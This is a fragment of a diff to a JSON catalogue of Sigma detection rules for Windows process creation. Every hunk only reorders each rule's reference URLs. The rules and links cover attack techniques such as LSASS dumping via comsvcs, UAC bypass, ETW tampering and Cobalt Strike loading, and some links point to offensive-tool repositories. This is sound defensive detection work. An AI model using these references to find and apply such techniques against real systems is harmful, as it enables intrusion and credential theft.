"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_modules.yml" ], "tags": [ @@ -52300,9 +52324,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/nao_sec/status/1530196847679401984", - "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", "https://twitter.com/_JohnHammond/status/1531672601067675648", + "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", + "https://twitter.com/nao_sec/status/1530196847679401984", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt.yml" ], "tags": [ @@ -52401,11 +52425,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", "https://twitter.com/GadixCRK/status/1369313704869834753?s=20", + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "https://twitter.com/BleepinComputer/status/1372218235949617161", "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3", - "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", - "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_hafnium.yml" ], "tags": [ @@ -52439,8 +52463,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_ps.yml" ], @@ -52606,10 +52630,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/", "https://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support", - "https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/", + "https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/", "https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7", + "https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_16bit_application.yml" ], "tags": [ @@ -52700,8 +52724,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax", "https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" ], "tags": [ @@ -52860,8 +52884,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", + "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_appx_execution.yml" ], "tags": [ @@ -52884,8 +52908,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_30.09.2022.txt", "https://app.any.run/tasks/4985c746-601e-401a-9ccf-ae350ac2e887/", + "https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_30.09.2022.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lolbin_non_c_drive.yml" ], "tags": [ @@ -52996,9 +53020,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md", "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml" ], "tags": [ @@ -53151,9 +53175,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/lukebaggett/dnscat2-powershell", "https://blu3-team.blogspot.com/2019/08/powershell-dns-c2-notes.html", "https://ragged-lab.blogspot.com/2020/06/it-is-always-dns-powershell-edition.html", + "https://github.com/lukebaggett/dnscat2-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscat2_powershell_implementation.yml" ], "tags": [ @@ -53252,8 +53276,8 @@ "logsource.product": "windows", "refs": [ "https://blog.malwarebytes.com/threat-analysis/2016/04/rokku-ransomware/", - "https://digital-forensics.sans.org/blog/2010/06/04/wmic-draft/", "https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1", + "https://digital-forensics.sans.org/blog/2010/06/04/wmic-draft/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_execution.yml" ], "tags": [ @@ -53321,8 +53345,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/", "https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#bypass-or-avoid-amsi-by-version-downgrade-", + "http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_downgrade_attack.yml" ], "tags": [ @@ -53601,8 +53625,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_attrib_system.yml" ], "tags": [ @@ -53800,10 +53824,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return", "https://nodejs.org/api/cli.html", - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_node_abuse.yml" ], "tags": [ @@ -53836,8 +53860,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/JohnLaTwC/status/1082851155481288706", "https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03", + "https://twitter.com/JohnLaTwC/status/1082851155481288706", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_appdata.yml" ], "tags": [ @@ -53871,8 +53895,8 @@ "logsource.product": "windows", "refs": [ "https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b", - "https://github.com/hfiref0x/UACME", "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", + "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml" ], "tags": [ @@ -54040,10 +54064,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", - "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/", "https://adsecurity.org/?p=2604", + "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml" ], "tags": [ @@ -54076,8 +54100,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/0gtweet/status/1602644163824156672?s=20&t=kuxbUnZPltpvFPZdCrqPXA", "https://twitter.com/pabraeken/status/990717080805789697", + "https://twitter.com/0gtweet/status/1602644163824156672?s=20&t=kuxbUnZPltpvFPZdCrqPXA", "https://lolbas-project.github.io/lolbas/Binaries/Runonce/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_runonce_execution.yml" ], @@ -54137,8 +54161,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/mttaggart/quasar", "https://taggart-tech.com/quasar-electron/", + "https://github.com/mttaggart/quasar", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml" ], "tags": [ @@ -54194,12 +54218,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Wietze/status/1542107456507203586", + "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", "https://twitter.com/shantanukhande/status/1229348874298388484", - "https://twitter.com/Hexacorn/status/1224848930795552769", "https://twitter.com/pythonresponder/status/1385064506049630211?s=21", "https://twitter.com/SBousseaden/status/1167417096374050817", - "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", + "https://twitter.com/Hexacorn/status/1224848930795552769", + "https://twitter.com/Wietze/status/1542107456507203586", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml" ], "tags": [ @@ -54236,15 +54260,15 @@ "logsource.product": "windows", "refs": [ "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", - "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", - "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", "https://twitter.com/_xpn_/status/1268712093928378368", - "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", - "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", - "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", "http://managed670.rssing.com/chan-5590147/all_p1.html", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf", "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", "https://bunnyinside.com/?term=f71e8cb9c76a", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_etw_modification_cmdline.yml" ], "tags": [ @@ -54377,8 +54401,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/", + "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_recon_activity.yml" ], "tags": [ @@ -54467,9 +54491,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/pabraeken/status/990758590020452353", "https://docs.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/", - "https://twitter.com/pabraeken/status/990758590020452353", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" ], "tags": [ @@ -54502,9 +54526,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js", "https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/", "https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/", - "https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_koadic.yml" ], "tags": [ @@ -54710,9 +54734,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection", "https://github.com/Azure/Azure-Sentinel/blob/43e9be273dca321295190bfc4902858e009d4a35/Detections/MultipleDataSources/SOURGUM_IOC.yaml", "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", - "https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_sourgrum.yml" ], "tags": [ @@ -54788,10 +54812,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/vysecurity/status/873181705024266241", - "https://lolbas-project.github.io/lolbas/Binaries/Rpcping/", "https://twitter.com/vysecurity/status/974806438316072960", + "https://lolbas-project.github.io/lolbas/Binaries/Rpcping/", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)", + "https://twitter.com/vysecurity/status/873181705024266241", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rpcping.yml" ], "tags": [ @@ -54859,8 +54883,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" ], "tags": [ @@ -54901,8 +54925,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/", "https://blog.sekoia.io/lucky-mouse-incident-response-to-detection-engineering/", + "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/", "https://github.com/jpillora/chisel/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chisel_usage.yml" ], @@ -54993,8 +55017,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml", "https://twitter.com/pabraeken/status/993497996179492864", + "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vboxdrvinst.yml" ], "tags": [ @@ -55095,8 +55119,8 @@ "logsource.product": "windows", "refs": [ "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_disable_defender_av_security_monitoring.yml" ], "tags": [ @@ -55120,8 +55144,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md", "https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_fodhelper.yml" ], "tags": [ @@ -55514,8 +55538,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_protocolhandler_download.yml" ], "tags": [ @@ -55581,8 +55605,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps", "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", + "https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps", "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_web_request_cmd_and_cmdlets.yml" ], @@ -55649,10 +55673,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/", + "https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/", "https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/", "https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/", - "https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/", + "https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_emotet.yml" ], "tags": [ @@ -55825,9 +55849,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "https://www.intrinsec.com/apt27-analysis/", + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml" ], "tags": [ @@ -55903,8 +55927,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/cw1997/NATBypass", "https://github.com/HiwinCN/HTran", + "https://github.com/cw1997/NATBypass", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_htran.yml" ], "tags": [ @@ -55938,8 +55962,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown", "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_logoff.yml" ], "tags": [ @@ -55972,9 +55996,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5", - "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/", + "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", + "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml" ], "tags": [ @@ -56330,8 +56354,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.011/T1218.011.md", + "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_script_run.yml" ], "tags": [ @@ -56422,10 +56446,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/antonioCoco/RogueWinRM", + "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", "https://twitter.com/Cyb3rWard0g/status/1453123054243024897", - "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", - "https://github.com/antonioCoco/RogueWinRM", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml" ], "tags": [ @@ -56458,10 +56482,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/", - "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b", "https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/", "https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers", + "https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/", + "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b", "https://www.joesandbox.com/analysis/443736/0/html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_revil_kaseya.yml" ], @@ -56520,9 +56544,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.cobaltstrike.com/help-windows-executable", - "https://redcanary.com/threat-detection-report/", "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://redcanary.com/threat-detection-report/", + "https://www.cobaltstrike.com/help-windows-executable", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml" ], "tags": [ @@ -56635,9 +56659,9 @@ "logsource.product": "windows", "refs": [ "https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks", - "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/", - "https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing", "https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files", + "https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing", + "https://pentestlab.blog/2020/02/24/parent-pid-spoofing/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_selectmyparent.yml" ], "tags": [ @@ -56670,10 +56694,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://twitter.com/splinter_code/status/1483815103279603714", "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", + "https://twitter.com/splinter_code/status/1483815103279603714", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun_priv_user.yml" ], "tags": "No established tags" @@ -56694,9 +56718,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd", "https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/", "https://docs.microsoft.com/en-us/azure/dns/dns-zones-records", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml" ], "tags": [ @@ -56754,8 +56778,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/", "https://twitter.com/SwiftOnSecurity/status/1455897435063074824", + "https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cmdl32.yml" ], "tags": [ @@ -56798,8 +56822,8 @@ "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets", "https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml" ], "tags": [ @@ -56865,8 +56889,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", + "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml" ], "tags": [ @@ -56935,8 +56959,8 @@ "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Rasautou/", - "https://github.com/fireeye/DueDLLigence", 